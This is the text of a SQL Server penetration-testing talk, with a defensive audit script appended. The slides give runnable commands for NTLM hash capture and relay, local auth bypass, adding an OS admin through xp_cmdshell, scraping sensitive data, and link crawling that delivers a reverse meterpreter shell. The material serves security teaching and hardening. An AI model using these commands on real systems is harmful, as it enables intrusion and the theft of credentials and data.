  • 3. What are we going to cover? 1. Database entry points 2. Domain user → Database user 3. Database user → OS admin 4. OS admin → Database admin 5. Database admin → OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
  • 4. Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
  • 5. Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
  • 7. Entry Points: Summary Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
  • 8. DOMAIN user → DATABASE user Privilege Inheritance
  • 9. Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
  • 10. Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
  • 11. Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
  • 12. Privilege Inheritance: Verify Access Test current user's access to SQL Servers with osql: FOR /F "tokens=*" %i in ('type sqlservers.txt') do osql -E -S %i -Q "select 'I have access to:'+@@servername"
  • 13. Privilege Inheritance: Verify Access Test an alternative user's access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
  • 16. DATABASE USER → OS ADMIN SMB Capture/Relay
  • 17. SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
  • 18. SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
  • 20. SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 21. SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> set SMBPROXY <evil server> run
  • 22. SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 23. SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 24. SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
  • 25. SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
  • 26. SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> set SMBPROXY <evil server> run
  • 27. SMB Relay: Get Meterpreter Shells
  • 28. SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql -E -Q "whatever you want" If password: • Sign in via RDP • Open a cmd console • osql -E -Q "whatever you want"
  • 29. DEMO
  • 30. Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
  • 31. OS ADMIN → DATABASE ADMIN SQL Server Local Authorization Bypass
  • 32. Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
  • 33. Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
  • 34. Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec -s cmd.exe osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')" Execute queries as sysadmin with SSMS: psexec -i -s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
  • 35. Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
  • 36. Local Auth Bypass: Get Sysadmin Create a sysadmin in the database using the Metasploit mssql_local_auth_bypass post module: In Meterpreter type "background" to return to msfconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
  • 37. SQL Server Auth Bypass: Got Sysadmin
  • 38. Do a crazy whale dance! To the left… To the right… Now dive!
  • 39. DATABASE ADMIN → OS ADMIN xp_cmdshell
  • 40. XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
  • 41. XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll";
  • 42. XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure 'show advanced options', 1; reconfigure; go; sp_configure 'xp_cmdshell', 1; reconfigure; go;
  • 43. XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell 'net user myadmin MyP@sword1' EXEC master..xp_cmdshell 'net localgroup administrators /add myadmin'
  • 45. Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
  • 46. Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
  • 47. Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
  • 48. Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
  • 49. Finding Data: Module Output
  • 51. Do a crazy cat disco dance!
  • 53. Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
  • 54. Shared Service Accounts: Diagram
  • 55. Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell 'osql -E -S HVA -Q "select super.secret.data"' More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking-with-the-osql-utility/
  • 57. Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
  • 58. Database Link Crawling: Diagram
  • 59. Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
  • 60. Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
  • 61. Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
  • 62. Database Link Crawling: You Get it! ….You get the point. You can follow links until you run out.
  • 63. Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,'SELECT * FROM openquery(HVA,''SELECT 1;exec xp_cmdshell ''''ping 192.168.1.1'''' '')')
  • 64. Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
  • 65. Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
  • 66. Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
  • 67. Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
  • 68. Database Link Crawling: Attack!
  • 70. Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
  • 71. Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
  • 72. Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
  • 73. Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
  • 74. Conclusions Configure SMB SIGNING
  • 75. Conclusions don’t do DRUGS
  • 76. Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012
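The conclusions ask for least privilege on every account in the chain; the T-SQL audit below is an added example, not part of the slides or of NetSPI's tooling, that checks one instance for each misconfiguration the talk strings together (broad group logins, public access to the UNC-capable extended procedures, the service account, xp_cmdshell, sysadmin membership, and linked-server login mappings). It assumes a sysadmin connection to SQL Server 2008 R2 SP1 or later (sys.dm_server_services does not exist before that); every other object is a standard catalog view.

```sql
-- Added example: hardening audit for the escalation paths in the talk.
-- Assumes a sysadmin connection to SQL Server 2008 R2 SP1 or later.
-- Every query lists a finding; an empty result set is the good outcome.

-- 1. Privilege inheritance (slides 8-13): broad Windows groups holding a login.
--    A row for Domain Users, BUILTIN\Users or Authenticated Users means every
--    domain or local user can connect and reach everything granted to public.
SELECT name AS login_name, type_desc, create_date
FROM sys.server_principals
WHERE type = 'G'            -- Windows group
  AND is_disabled = 0
  AND (name LIKE '%\Domain Users'
       OR name = 'BUILTIN\Users'
       OR name LIKE '%\Authenticated Users')
ORDER BY name;

-- 2. SMB capture/relay (slides 16-28): who may EXECUTE the UNC-capable
--    extended procedures. Out of the box they are granted to public in
--    master, so any login can make the service account authenticate to a
--    UNC path of the caller's choosing. Revoke from public where unused.
SELECT o.name AS procedure_name, pr.name AS grantee,
       dp.state_desc, dp.permission_name
FROM master.sys.database_permissions AS dp
JOIN master.sys.all_objects AS o
     ON o.object_id = dp.major_id AND dp.class = 1   -- object permission
JOIN master.sys.database_principals AS pr
     ON pr.principal_id = dp.grantee_principal_id
WHERE o.name IN ('xp_dirtree', 'xp_fileexist', 'xp_getfiledetails')
ORDER BY o.name, pr.name;

-- 3. SMB capture/relay: the account the engine runs as (slide 18 table).
--    LocalSystem/NetworkService expose only the computer account to capture;
--    a local admin, domain user or domain admin account is also relayable.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';

-- 4. xp_cmdshell (slides 39-43): is it enabled, and is it registered at all?
--    value_in_use = 1 means OS command execution is one EXEC away for any
--    sysadmin. sp_dropextendedproc removes the registration, but a sysadmin
--    can re-add it (slide 41), so audit both the setting and the object.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

SELECT name AS registered_extended_proc
FROM master.sys.all_objects
WHERE type = 'X' AND name = 'xp_cmdshell';

-- 5. Least privilege (slide 72): every member of sysadmin. On SQL Server
--    2000-2008 NT AUTHORITY\SYSTEM is a member by default, which is what
--    the psexec -s bypass on slide 34 relies on.
SELECT p.name AS login_name, p.type_desc, p.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS p ON p.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY p.name;

-- 6. Database link crawling (slides 57-71): how each link maps local logins
--    to the remote server. local_principal_id = 0 is the catch-all mapping;
--    a fixed remote_name on that row means every local login (including one
--    reached through SQL injection) hits the remote server as that account,
--    and a remote sysadmin there is what makes openquery() + xp_cmdshell work.
SELECT s.name AS linked_server, s.data_source, s.provider,
       CASE WHEN ll.local_principal_id = 0 THEN '(all logins)'
            ELSE SUSER_NAME(ll.local_principal_id) END AS local_login,
       ll.uses_self_credential,
       ll.remote_name,
       s.is_rpc_out_enabled, s.is_data_access_enabled
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;
```

Run it on each instance found in the discovery step; a link whose catch-all row carries a fixed remote_name, or a service account that is a domain user, is the finding to fix first.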